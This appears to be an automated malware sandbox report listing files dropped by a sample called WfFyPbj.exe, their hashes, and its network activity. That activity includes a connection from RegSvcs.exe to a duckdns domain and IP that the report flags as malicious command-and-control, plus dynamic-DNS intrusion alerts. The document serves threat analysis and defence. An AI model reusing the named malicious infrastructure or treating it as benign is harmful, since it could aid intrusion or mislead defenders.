MD5: 11d8800a15ebdb99487edebc06ef86e8
SHA256: 7e63ef6f2a78b51ad2915d0ca50d0b0d0420600ba8f4a99ee6cdae3ac7868a99
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\kwp.xl
text
MD5: 60bce68219ac22682488f4b02405694e
SHA256: dd206de951223be9b409fe0884603b17b35ff409ae19253e4b12ec09c77934e1
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\fjd.pdf
text
MD5: ea3e95e581795a8fad88e8f5bc6523bb
SHA256: fce44787111ed976da4eade1d9ff438d1854bc4b3a9a44c71936be4b8bcd53ca
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\olh.mp3
text
MD5: 7b4bc7c28ea0ffb5ba1b2668b5e49dcd
SHA256: 5d3cb61feffab53d0e3a8b651191ae33a309ff163e0d3a807f0b454fb5903bb8
3000
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms
binary
MD5: 1b4ee650b3123bd273d2e63bbf10ff2a
SHA256: 8d46217e909ad47f7d7c19f1c7c4b8d8d18c5249281e73d194c82215fe5ae2d8
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\cnk.txt
text
MD5: a6ea2d6bb0ac8834155d4091d4f81fec
SHA256: 7c7018ab6fc90a78f4be45d91dbca9d9b001e383e33866016d08f2b0f524a5b9
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\mvk.xl
text
MD5: b94467aef46e19383eb48c5a2471afe3
SHA256: c4c434ae9d22a3249c53af8c683adebd148e658c08f433533a1f067b3219d556
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\emu.mp3
text
MD5: 5709f32a91fe4fd8db720bcabd3546d1
SHA256: c9992eb858b214114aef5f2bdfae725920e4550a4b8e77301144d9363e3f9760
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\mlk.mp4
text
MD5: 240a4e26582b6d589ff0e49c72e1007a
SHA256: 768bb11a1a76f4704fc35ea39e8f8926b998e1a2d1dadf87e7042ae29e3966e2
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\dwa.icm
text
MD5: 3a5452c2af12fb5f972f8ff46c91888c
SHA256: cb857b22e73625770e18ec4029da260e7f99f4738e847b16b5eaa56d294f687b
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\idn.docx
text
MD5: b0341df38a4783109002ab4cf33c9d55
SHA256: c2073ffebe269e494a467760438c9f2a34c109584965555e4a5ffe2febeb4858
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\fld=ktl
text
MD5: 2ab49ff2e034d5c9cd371aa68fb4b67b
SHA256: 04a711b91241c5d9b0513f02535b46c3cd9181ace04c6a673dde5da1486373df
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\ibw.mp4
text
MD5: 7cba224e33403861f74573f8464d3d2f
SHA256: ad912169922c0f25f333cf4235429b63c567e349080a4cb6c78f2f49f8279f7e
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\plv.mp4
text
MD5: 61f1aa2f3a4ec269b21904a9501f5f67
SHA256: dbadef1663555f8d0aa056a87cf9e7403926b26d44d45198982973e41836dd95
3000
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{D6448701-150F-11E9-AA93-5254004A04AF}.dat
––
MD5:  ––
SHA256:  ––
3716
powershell.exe
C:\Users\admin\AppData\Roaming\WfFyPbj.jpg
image
MD5: 38c3261d8e98a3bbbcfaff8c259a9dde
SHA256: 98f6e62abc7a08ff41584696cf46da99c86c3eef95d1cf3bf6262054e71e4e74
3716
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF21468e.TMP
binary
MD5: 2bcad5da21cb41b727abde7d6b6990b8
SHA256: ab1397e3a31059329829ae2164787589945b1459ed2e1b7328e86ed497a6f9f3
3716
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 2bcad5da21cb41b727abde7d6b6990b8
SHA256: ab1397e3a31059329829ae2164787589945b1459ed2e1b7328e86ed497a6f9f3
3716
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\84U14WF1C1GOHJU9ZFQS.temp
––
MD5:  ––
SHA256:  ––
3000
iexplore.exe
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
––
MD5:  ––
SHA256:  ––
3000
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[3].png
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
3000
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
––
MD5:  ––
SHA256:  ––
3000
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms~RF2205b7.TMP
binary
MD5: 1b4ee650b3123bd273d2e63bbf10ff2a
SHA256: 8d46217e909ad47f7d7c19f1c7c4b8d8d18c5249281e73d194c82215fe5ae2d8

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
1
TCP/UDP connections
15
DNS requests
8
Threats
4

HTTP requests

PID Process Method HTTP Code IP URL CN Type Size Reputation
3000 iexplore.exe GET 200 13.107.21.200:80 http://www.bing.com/favicon.ico US
image
whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
3000 iexplore.exe 13.107.21.200:80 Microsoft Corporation US whitelisted
3716 powershell.exe 52.219.32.73:443 Amazon.com, Inc. SG unknown
1144 RegSvcs.exe 45.249.90.124:1609 Korea Telecom KR malicious

DNS requests

Domain IP Reputation
www.bing.com 13.107.21.200
204.79.197.200
whitelisted
s3-ap-southeast-1.amazonaws.com 52.219.32.73
shared
idea1com2002.duckdns.org 45.249.90.124
malicious
dns.msftncsi.com 131.107.255.255
whitelisted

Threats

PID Process Class Message
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain

Debug output strings

No debug info.